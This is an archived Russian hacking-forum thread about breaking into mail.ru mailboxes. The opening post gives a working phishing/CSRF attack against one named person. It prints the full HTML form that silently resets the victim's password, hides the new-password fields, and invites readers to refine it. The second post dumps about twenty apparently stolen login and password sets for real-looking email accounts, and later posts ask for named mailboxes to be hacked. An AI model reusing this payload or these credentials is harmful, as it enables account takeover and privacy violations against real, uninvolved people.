Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

mail.ru и почта

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> mail.ru и почта
Имя
Сообщение << Старые топики   Новые топики >>
mail.ru и почта - 2006-11-04 02:22:01.193333   
Лиза1980

Сообщений: 28
Оценки: 0
Присоединился: 2006-11-04 01:25:37.503333
 Ситуация: Есть я -неочень опытная админша, и вообще наивная чукотская девушка. Есть он - злодей козел и прочее.
Цель: Почитать о чем этот козел догаваривается с такими как я.
Зная его почтовый адрес назовем его как Kozlodey@mail.ru, напечатала в гугле строку: взлом mail.ru.
На что тот услужливо выдал море ссылок среди которых была одна трезвая статья насчет использования формы смены пароля самого mail.ru. Приведённые коды в той же статье не работали, о чем и было честно написато автором статьи в постскриптуме.
Но наше дело правое, решила я по аналогии посмотреть и что же там на этой странице смена пароля творится, открыла её исходник. Там было куча всяких ява скриптов проверяющих длину пароля и проч.
И среди них самая обыкновенная формочка следующего содержания:
&lt;FORM method=post action="modifypass" onSubmit="return CheckPassword(this);" name="PFrm"&gt; &lt;input type="hidden" name="modify" value="1"&gt; &lt;input type="hidden" name="Username" value="markofan"&gt; &lt;input type="password" name="oldPswd" size="20"&gt; &lt;input&nbsp; type="submit" value="Сохранить" class=but_min&gt; &lt;input&nbsp; type="reset" value="Сбросить" class=but_min&gt; &lt;input type="password" name="Password" value="" size="20"&gt; &lt;input type="password" name="Password_Verify" value="" size="20" &gt; &lt;/form&gt; Форма в оригинале перемежается тегами таблиц и содержит параметры стилей которые мне были абсолютно не нужны.
Так вот, сохранив всякие ява скрипты содержащиеся в странице а также саму форму послала получившуюся htm себе предварительно выствив в параметры "Password" и "Password_Verify" в значение "999999" а  в значение "Username" имя пользователя свое. открыла письмо вбила текущий пароль и после нажатия кнопки сахронить с треском вылетела из почтаря.
Этап первый завершился успешно, форма работает пароли меняет!
При просмотре сообщения горит красная надпись гласящая о том что мол тут содержиться потенциально опасный код.
Это было нехорошо т.к. могло наводить на нехорошие мысли читающего.
Поразмыслив и вспомнив что автор предидущей статьи как раз таки использовал форму написанную в яве, решила удалить все скрипты, заодно и немного замаскировать сообщение.
Следующий код выглядел так: &nbsp; &lt;!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"&gt; &lt;html&gt;&nbsp; &lt;head&gt; &lt;META http-equiv="content-type" content="text/html; charset=windows-1251"&gt; &lt;/head&gt;&lt;style="text/css"&gt; .hide {visibilty:hidden} &lt;body&gt; &lt;center&gt; &lt;b&gt;&lt;font face="Arial" color="#0000FF"&gt;Чтобы просмотреть содержимое письма введите ваш текущий пароль: &lt;/font&gt;&lt;/b&gt; &lt;FORM method=post action="modifypass" onSubmit="return CheckPassword(this);" name="PFrm"&gt; &lt;input type="hidden" name="modify" value="1"&gt; &lt;input type="hidden" name="Username" value="Kozlodey"&gt; &lt;input type="password" name="oldPswd" size="20"&gt; &lt;input&nbsp; type="submit" value="Открыть" class=but_min&gt; &lt;div style="hide"&gt; &lt;p&gt; &lt;input type="password" name="Password" value="2222222" size="1"&gt; &lt;input type="password" name="Password_Verify" value="2222222" size="1" &gt; &lt;/p&gt;&lt;/div&gt; &lt;/form&gt; &lt;/center&gt; &lt;/body&gt; &lt;/html&gt;&lt;/style&gt; Заодно уьрала кнопку сброса пароля, данная метода не помогла, и пришлось не мудурствуя лукаво просто набить кучу &lt;p&gt;&amp;nbsp;&lt;/p&gt; отодвинув два окошка содержащих новый пароль и его подтверждение на пару страниц в низ.
Прикрепила htm-ку к письму и ушла спать… на утро попробовала и пароль действительно оказался тот который был прописан в форме отправленной мною ему.

В общем ситуация такая - хотите поиметь пароль от какого-нидь ящика на майл.ру составляйте письмецо с формочкой, что вы там в письме напишите я не знаю главное чтобы владелец набрал свой текущий пароль и нажал кнопку.
Умные дяденьки отседова наверняка смогут усовершенствовать данную формочку чтобы она под значение текущего пароля искала его в кукисах и вписывала. Что несомненно облегчит задачу владельца ящика - ему останется только нажать кнопку!-)

З.Ы.: если чел проверяет почту не через вэб-интерфейс а какой-нить прогой данные потуги бессмыслеты.
ЗЗ.Ы.: если вам не нужно то что было у него в ящике проще выставить его перед администрацией майл.ру как спамера и после удаления аккаунта зарегистрировать этот же ящик на себю любимого.
ЗЗЗ.Ы.:Все перечисленное выше абсолютный вымысел авторши наевшейся грибов, все совпадения с реальностью случайны.
Post #: 1
RE: mail.ru и почта - 2006-11-04 23:31:45.083333   
monster007

Сообщений: 2
Оценки: 0
Присоединился: 2006-11-04 22:40:45.070000
 помогите пожалуйста хакнуть мыло nigga2004@mail.ru буде безмерно благодарен!!! что то я не вдуплю как поламать!!!!не поддаётся скатина! вот даю список уже поломаных если кома надо дерзайте !!!!  

akim_2002
standart
akimov
akimov
akim_2002@mail.ru




log. mishka-20
op. 19091986
пр1. 19092000
пр2. 19092000
em. mishka-20@inbox.ru




log: girl_in_black05
ор: milorend
пр1: the end
пр2: the end
em: girl_in_black05@mail.ru





log: annetta-luck
ор: 668853
пр1: 240188
пр2: 240188
em: annetta-luck@mail.ru




log: diana_slyness
ор: uecmehjl
пр1: gfgffktrctq
пр2: gfgffktrctq
em: diana_slyness@mail.ru




log: dalmatinchik
op: zsEfv55555
em: dalmatinchik@inbox.ru





masik_55@mail.ru
ор: 4tkjdt4tcrbqAFRN
em: baxa88@mail.ru




log: bug.81
ор: 685622
пр1: 2503685622
пр2: 2503685622
em: bug.81@mail.ru






log: neriashka
ор: 123456789
пр1: 1122334455
пр2: 1122334455
em: neriashka@mail.ru






log:lu1990,,,,
ор:TANA111990
пр1TANA162006
пр2TANA162006
em: lu1990@list.ru





log: bitter7weet
ор: admin
пр1: guz1bn6h
пр2: guz1bn6h
em: bitter7weet@mail.ru




log: lucertola
op: hbg52wsx
пр1: hbg52wsx
пр2: hbg52wsx
em: lucertola@bk.ru



log: koshka
op: 9111987
пр1: 24111985
пр2: 24111985
em: koshka_999@mail.ru




log: love_is_true
ор: 654321
пр1: 06021988
пр2: 06021988
em: svitlyxa@mail.ru



аngel87
angel87
87angel
87angel
angel12291987@mail.ru







log: mndanilova@rambler.ru
ор: kjhf
пр1:rerehepf
пр2:rerehepf
mndanilova@rambler.ru





log: bankirsha3
op: zubkova
пр1: kohanova
пр2: kohanova
em: bankirsha3@inbox.ru



Log: Элина Исмагилова
op: 578291
пр1: 519803
пр2: 519803
em: elina3786@bk.ru





log gulchik
op  26101985
пр1: 28041984
пр2: 28041984
em gulchik-06@mail.ru




log: krista_1987
ор: kristina
пр1: mama
пр2: mama
em: krista_1987@mail.ru



log: Тошка
ор: 05224
пр1: 54045
пр2: 54045
em: Grezi_05@mail.ru





log: weasel
ор: 9999
пр1: yfcntymrf
пр2: yfcntymrf
em: weasel_88@mail.ru


ПОМОГИТЕ ПОЛАМАТЬ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![X(][X(][X(]
Post #: 2
RE: mail.ru и почта - 2006-11-05 00:15:04.146666   
Лиза1980

Сообщений: 28
Оценки: 0
Присоединился: 2006-11-04 01:25:37.503333
 способ сверху - ломать сам мыл.ру смысла не вижу в лучшем случае поламают коннект, в худшем лет семь трудовых исправительных работ где нить на колыме, и не дай бог тебе быть красивым =)
Post #: 3
RE: mail.ru и почта - 2006-11-05 00:21:34.270000   
monster007

Сообщений: 2
Оценки: 0
Присоединился: 2006-11-04 22:40:45.070000
 если сможешь помоги поламать это мыло или подскажи кто в этом мне может помоч!!!!!!!!
Post #: 4
RE: mail.ru и почта - 2006-11-06 11:41:33.240000   
rape_and_drop

Сообщений: 79
Оценки: 0
Присоединился: 2006-10-26 01:50:40.726666
 Я смотрю тут взломщики мыльных ящиков развелись(или спамеры?)!
Так кто реально мыло бомбил,раскажите статистику.
Post #: 5
RE: mail.ru и почта - 2006-11-09 16:42:49.926666   
rollervl

Сообщений: 3
Оценки: 0
Присоединился: 2006-11-09 16:37:31.083333
 слушайте это конечно все классно. Ну а вот как можно взломать mail.ru если человек пользуется the bat? Может есть какието приемы? Подскажите. Спасибо.:)
Post #: 6
RE: mail.ru и почта - 2006-11-09 17:42:30.866666   
-=lebed=-

Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
 Сегодня представлена активная XSS на маил.ру инфа тут
Можете убедиться сами
Уже усё, пример удалили, наверно латают скрипт…
Post #: 7
RE: mail.ru и почта - 2006-11-10 01:16:14.676666   
rollervl

Сообщений: 3
Оценки: 0
Присоединился: 2006-11-09 16:37:31.083333
 И что теперь делать?8|
Post #: 8
RE: mail.ru и почта - 2006-11-12 03:44:47.286666   
Stefun

Сообщений: 48
Оценки: 0
Присоединился: 2006-11-11 01:25:17.350000
 Баклуши бить! 8| Можно пока почитать книжки
Post #: 9
RE: mail.ru и почта - 2006-11-12 03:47:55.270000   
rollervl

Сообщений: 3
Оценки: 0
Присоединился: 2006-11-09 16:37:31.083333
 Ну вот, а мне так срочно надо узнать пароль мыла…..и желательно знать технологию этого всего….
Post #: 10
RE: mail.ru и почта - 2007-02-17 23:28:31.733333   
Epifan

Сообщений: 1
Оценки: 0
Присоединился: 2007-02-17 22:22:01.783333
 У меня  подруга  украла  пароль и  затёрла мои фотки как мне вернуть мой
ящик  назад и наказать её у неё тоже есть почтовый ящик его, если можно
сломать?  Сколько  я буду должна?Мой бывший ящик [email=mihailovar@mail.ru]mihailovar@mail.ru[/email]  и
ящик подруги [email=maslennikova85@mail.ru]maslennikova85@mail.ru[/email][:(]
Post #: 11
Страниц:  [1]
Все форумы >> [В Сети] >> mail.ru и почта







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.